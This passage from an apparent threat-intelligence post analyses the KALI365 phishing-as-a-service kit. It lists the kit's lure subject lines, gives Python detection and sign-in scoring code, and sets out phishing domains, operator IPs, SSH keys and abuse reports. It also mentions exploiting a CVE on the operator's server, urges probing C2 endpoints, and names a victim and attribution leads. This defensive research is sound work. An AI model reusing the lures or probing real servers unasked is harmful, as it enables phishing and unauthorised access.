| DocuSign | {{sender_name}} sent you a document to sign |
| Invoice | Invoice for [[company]] - Payment Due [[date]] |
| Adobe Sign | [[name]], agreement awaiting your signature |
| Security Alert | Security alert for [[email]] |
The phishing email that opened this investigation matched the Invoice template exactly.
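As an added example (not from the post or the kit), here is how a mail filter can turn the eight subject templates above into detection patterns: each {{...}} or [[...]] placeholder becomes a named wildcard, and an inbound subject that matches is tagged with the template name and the captured fields. The sample subjects are constructed.

```python
import re

# The eight subject-line templates extracted from the kit's React bundle (as listed above).
KALI365_SUBJECTS = {
    "SharePoint": "{{sender_name}} shared a document with you",
    "OneDrive": "{{sender_name}} shared a file with [[name]] via OneDrive",
    "Teams": "{{sender_name}} mentioned you in a Teams chat",
    "Voicemail": "You received a voicemail from {{sender_name}}",
    "DocuSign": "{{sender_name}} sent you a document to sign",
    "Invoice": "Invoice for [[company]] - Payment Due [[date]]",
    "Adobe Sign": "[[name]], agreement awaiting your signature",
    "Security Alert": "Security alert for [[email]]",
}

PLACEHOLDER = re.compile(r"\{\{(\w+)\}\}|\[\[(\w+)\]\]")
# Reply/forward prefixes, including the German AW:/WG: forms a de-CH target would see.
REPLY_PREFIX = re.compile(r"^(?:(?:re|fw|fwd|aw|wg)\s*:\s*)+", re.IGNORECASE)

def template_to_regex(template):
    """Escape the literal text and turn each placeholder into a named wildcard group."""
    pattern, pos = "^", 0
    for m in PLACEHOLDER.finditer(template):
        pattern += re.escape(template[pos:m.start()])
        field = m.group(1) or m.group(2)
        pattern += r"(?P<%s>.+?)" % field
        pos = m.end()
    pattern += re.escape(template[pos:]) + "$"
    return re.compile(pattern, re.IGNORECASE)

COMPILED = {name: template_to_regex(t) for name, t in KALI365_SUBJECTS.items()}

def match_subject(subject):
    """Return (template_name, captured_fields) for the first template the subject
    matches, or None. Whitespace runs and reply prefixes are normalised first."""
    normalised = REPLY_PREFIX.sub("", " ".join(subject.split()))
    for name, rx in COMPILED.items():
        m = rx.match(normalised)
        if m:
            return name, m.groupdict()
    return None

# Constructed sample subjects (not from the incident)
SAMPLE_SUBJECTS = [
    "Invoice for Muster AG - Payment Due 07.04.2026",
    "FW: Hans  Meier shared a document with you",
    "Security alert for alice@example.ch",
    "Team lunch on Friday",
]

def tag_subjects(subjects):
    """Map each subject to its match result so the caller can score or route the message."""
    return {s: match_subject(s) for s in subjects}

if __name__ == "__main__":
    for subject, hit in tag_subjects(SAMPLE_SUBJECTS).items():
        print(repr(subject), "->", hit)
```

Several of these subjects are also what genuine SharePoint or DocuSign notifications look like, so a hit is a scoring signal to combine with link analysis (Instapage first hop, workers.dev redirect) rather than a standalone block rule.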
Confirmed victim organization: Marubeni America Corporation (from Joe Sandbox public analysis - Adobe Acrobat Sign device code lure, sender identity "Katou Kenny").
Lure brands supported: Microsoft 365, SharePoint, OneDrive, Teams, Azure AD, Outlook, Google Accounts, YouTube, Google Play, DocuSign, Adobe Acrobat Sign.
Delivery infrastructure: Cloudflare Workers (AiTM proxy) - each customer deploys their own Worker subdomain. Known customer Workers: papastrious.workers.dev, sureplugmarket.workers.dev, bdeda974c99320a3040456b8.workers.dev, p-mz12fq2s.workers.dev.
MITRE ATT&CK mapping:
| Technique | ID |
|---|---|
| Phishing: Spearphishing Link | T1566.002 |
| Adversary-in-the-Middle (AiTM token theft) | T1557 |
| Compromise Infrastructure: Serverless (CF Workers) | T1584.007 |
| Acquire Infrastructure: Domains | T1583.001 |
| Stage Capabilities: Digital Certificates | T1587.003 |
| Compromise Infrastructure: Web Services (victim site injection) | T1584.006 |
| Obtain Capabilities: PhaaS | T1588 |
| Acquire Infrastructure: VPS | T1583.003 |
| Valid Accounts (SSH operator access) | T1078 |
| Command and Control via SSH | T1021.004 |
11. Customer Infrastructure (26+ Domains)
Customer registration pattern: NameSilo registrar + DNSOWL nameservers. All registered March 27 – April 7, 2026. All pointed to 167.99.0.116 at time of scanning.
Unintended disruption: The operator's emergency migration on April 8 was executed without updating any customer DNS records. 22 of 26 verified customer domains still resolve to offline 167.99.0.116. Every customer's phishing panel went dark simultaneously. The operator prioritized their own escape over their customers' operations.
| Domain | First Seen | Category |
|---|---|---|
| taskflowscripts.com | 2026-03-27 | Document/workflow lure |
| myappsharepoint-doc.com | 2026-03-27 | SharePoint impersonation |
| kylianiz654.com | 2026-03-27 | AiTM phishing |
| documentsalived.com | 2026-03-27 | Document delivery lure |
| sharehubcom.com | 2026-03-28 | Microsoft SharePoint |
| constrnet.com | 2026-03-31 | Corporate impersonation |
| concentrateofficeguadmins.org | 2026-03-31 | Office admin lure |
| mscontactmembersheardliners.com | 2026-03-31 | Microsoft contact impersonation |
| duanemorrisadwateralchemyarchenterrureaudet.com | 2026-03-31 | Duane Morris (AmLaw 100) - legal sector targeting |
| 00085.icu | 2026-03-31 | AiTM phishing |
| infoqueer.org | 2026-04-01 | AiTM phishing |
| sharei9s.biz | 2026-04-01 | AiTM phishing |
| noboundseyetech.com | ~2026-03 | Microsoft Teams / SharePoint |
| 365securefiles.org | 2026-04-04 | Microsoft 365 file share |
| ms-teamsmeeting.top | ~2026-03 | Microsoft Teams |
| solumvp.sbs | ~2026-03 | Device code phishing |
| ctcafinancial.com | ~2026-03 | Financial org impersonation |
| natmanco.com | ~2026-03 | Corporate impersonation |
| democrakidsradio.org | ~2026-03 | Microsoft login |
| powwowavents.cc | ~2026-03 | AiTM phishing |
| sedoasiis.com | ~2026-03 | AiTM phishing |
| bookingservicestwo.sbs | ~2026-03 | Booking service lure |
| nikadent.icu | ~2026-03 | AiTM phishing |
| yakaclicker.com | ~2026-03 | DocuSign (DNS → O2Switch France - separate host) |
| verifyoff36s5hareddocauthby.biz | ~2026-03 | Document verification |
| foldersrunningpress.run | ~2026-03-31 | AiTM phishing |
| bonearte.com.br | - | Legitimate Brazilian clothing company - hijacked |
| adobeonlinedocauth.danaevasilis.gr | - | Legitimate Greek website - hijacked |
duanemorrisadwateralchemyarchenterrureaudet.com concatenates "Duane Morris" (a major US law firm with roughly 800 lawyers) with other company names: deliberate legal sector targeting.
12. The Operator Reacts
They noticed. Within hours of CVE-2025-30208 exploitation:
- New DigitalOcean droplet provisioned (146.190.33.201, Santa Clara)
- direct.duemineral.uk A record updated
- Old server 167.99.0.116 taken offline
- Vite dev server not re-exposed - they understood the attack vector
- OpenSSH on new server: ubuntu13.13 - older patch level than the server they fled (ubuntu13.15)
- 12 API endpoints removed, partial input validation added
- /health endpoint not removed - still leaking live victim counts
- /register not removed - storefront still open
- clicksideas.com still resolves to new server IP - personal domain still cross-contaminating criminal infrastructure
- 22 customer domains not updated - every paying customer's panel went dark with zero notice
New server also spawned a second independent backend on 162.243.166.119:5001 - healthy, 4-core, 2,620 active tokens - suggesting the operator is rebuilding capacity in parallel.
13. Takeaways for Defenders
AiTM makes most MFA deployments irrelevant. The attacker intercepts the session token after MFA completes. Only FIDO2/WebAuthn with domain origin binding (rpId) prevents this - the hardware key refuses to sign for a proxied domain. Conditional Access policies requiring compliant devices add a second barrier. Everything else - TOTP, SMS, push apps - is bypassable by AiTM.
When the sender is owned, email authentication means nothing. SPF/DKIM/DMARC all passed because the account was genuinely compromised from a prior AiTM campaign. This email was stage N+1 of an ongoing supply chain. Detection requires behavioral analysis: unusual sending patterns, geolocation anomalies, new device logins, off-hours access - not header verification.
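The behavioral signals listed above, turned into a small triage scorer, as an added example that is not part of the original post. The sign-in events and baseline are constructed for illustration; field names loosely resemble Microsoft 365 sign-in logs but are an assumption, not a vendor schema.

```python
"""Score sign-in events against a per-user baseline instead of trusting
SPF/DKIM/DMARC. Each anomaly the post names (new geo, new device,
off-hours access, unusual sending volume) adds one point."""
from collections import defaultdict
from datetime import datetime

# Constructed baseline of "normal" behaviour per user (assumed, not real data).
BASELINE = {
    "alice@example.com": {
        "countries": {"US"},
        "devices": {"dev-laptop-01"},
        "hours": set(range(7, 20)),  # working hours, assumed already in UTC
    },
}

# Constructed sign-in events (not real log data).
EVENTS = [
    {"user": "alice@example.com", "time": "2026-03-31T14:05:00Z",
     "country": "US", "device": "dev-laptop-01", "mail_sent": 3},
    {"user": "alice@example.com", "time": "2026-03-31T16:20:00Z",
     "country": "US", "device": "dev-phone-02", "mail_sent": 2},
    {"user": "alice@example.com", "time": "2026-04-01T02:40:00Z",
     "country": "NG", "device": "unknown-mobile", "mail_sent": 140},
]

def score_event(ev, baseline, mail_burst=50):
    """Return (score, reasons) for one sign-in event."""
    b = baseline.get(ev["user"])
    if b is None:
        return 1, ["no baseline for user"]
    reasons = []
    hour = datetime.fromisoformat(ev["time"].replace("Z", "+00:00")).hour
    if ev["country"] not in b["countries"]:
        reasons.append(f"new country {ev['country']}")
    if ev["device"] not in b["devices"]:
        reasons.append(f"new device {ev['device']}")
    if hour not in b["hours"]:
        reasons.append(f"off-hours login at {hour:02d}:00 UTC")
    if ev["mail_sent"] > mail_burst:
        reasons.append(f"burst of {ev['mail_sent']} outbound messages")
    return len(reasons), reasons

def triage(events, baseline, threshold=3):
    """Map user -> [(score, reasons)] for events at or above the threshold.
    A single new device (score 1) stays below it; the combined anomaly set
    of a compromised account (score 4) raises an alert."""
    alerts = defaultdict(list)
    for ev in events:
        score, reasons = score_event(ev, baseline)
        if score >= threshold:
            alerts[ev["user"]].append((score, reasons))
    return dict(alerts)
```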
A Starlink NetHandle contains a law enforcement subpoena path. STARLINK-863719539772915747-RW-LGOSNGA1-IPV4 - the ID 863719539772915747 is SpaceX's internal identifier for a specific terminal account in Lagos. Reference NET-135-129-124-0-1 in a subpoena to SpaceX Services, Inc. (1 Rocket Rd, Hawthorne, CA 90250). The operator's real identity is one legal process away.
Unauthenticated /health endpoints are high-value intelligence sources. 8,561+ live victim sessions counted with zero authentication. An open metrics endpoint proves active harm at scale, identifies database technology, CPU state, and worker health. Always probe /health, /status, /metrics, /actuator, /api/info, and /api/health on every C2 server.
The PhaaS market refilled in 60 days. KALI365 launched February 2026 - two months after Okitipi Samuel's arrest. Criminal PhaaS infrastructure is elastic. Takedowns create temporary vacuums, not permanent solutions. Sustained ecosystem disruption requires simultaneous coordination: law enforcement, registrars, hosting providers, CDN platforms, certificate authorities, and crypto payment processors - all at once, not sequentially.
IOC Summary
Operator infrastructure IPs (origin servers):
167.172.199.98, 134.209.55.33, 24.199.108.217, 157.230.53.233, 162.243.166.119, 159.223.147.230, 167.99.0.116, 146.190.33.201, 172.86.72.83
Cloudflare CDN IPs (origin masked):
172.67.140.80 (loadingdocuments.uk), 104.21.0.217 (duemineral.uk)
Operator SSH egress: 135.129.124.63 (Starlink, Lagos Nigeria, NetHandle NET-135-129-124-0-1)
Operator domains: duemineral.uk, loadingdocuments.uk, antired.uk, sharedocpdf.work, pdfdrive.work, clicksideas.com, deculvers.com, creaee.online, dpcusginmein.online
OxaPay merchant: 11153123
Shared TLS fingerprint: SHA1: 15af977ce25de452b96affa2addb1036 (ties 4 IPs)
SSH host keys:
- Active server: ED25519 AAAAC3NzaC1lZDI1NTE5AAAAINJMAlX1j4UZvY9wsx5YAnEnim3qJOWFhYHUbGsSdHqd
- Old server: ED25519 AAAAC3NzaC1lZDI1NTE5AAAAIOYSIjJR1YnyRtyP+lt0imVvoW5qIUdiYONWzDG+11LZ
Customer domain NameSilo/DNSOWL pattern: ns1.dnsowl.com, ns2.dnsowl.com - consistent across all 20+ NameSilo-registered customer domains
Full infrastructure map, complete IOC list, and abuse report targets available on request.
Abuse reports filed: DigitalOcean (all 8 IPs), RouterHosting/Cloudzy (172.86.72.83), Cloudflare (all operator domains + Workers accounts), Nominet (all 3 .uk domains - validation failure), Wild West Domains (deculvers.com), Namecheap (creaee.online, dpcusginmein.online, clicksideas.com), NameSilo (all customer domains), OxaPay (merchant 11153123), SpaceX Starlink (subscriber 863719539772915747, NetHandle NET-135-129-124-0-1), Microsoft MSTIC (device code phishing IOCs), ZeroSSL (cert issued to panel.duemineral.uk), Let's Encrypt (cert issued to panel.antired.uk).
#ThreatHunting #KALI365 #PhishingAsAService #AiTM #DeviceCodePhishing #Nigeria #Starlink #OSINT #ThreatIntelligence #CyberSecurity #DFIR #IncidentResponse #InfoSec #MicrosoftSecurity #IdentityTheft #CloudSecurity #PhishingAwareness #BEC